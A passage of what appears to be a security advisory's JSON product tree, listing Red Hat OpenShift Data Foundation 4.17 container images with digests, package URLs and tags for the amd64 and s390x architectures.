"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product_id": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product_id": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a?arch=amd64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product_id": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product_id": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product_id": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e?arch=amd64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product_id": "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product_id": "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product_id": "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product_id": "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product_id": "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product": {
"name": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product_id": "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product": {
"name": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product_id": "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product_id": "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product_id": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product": {
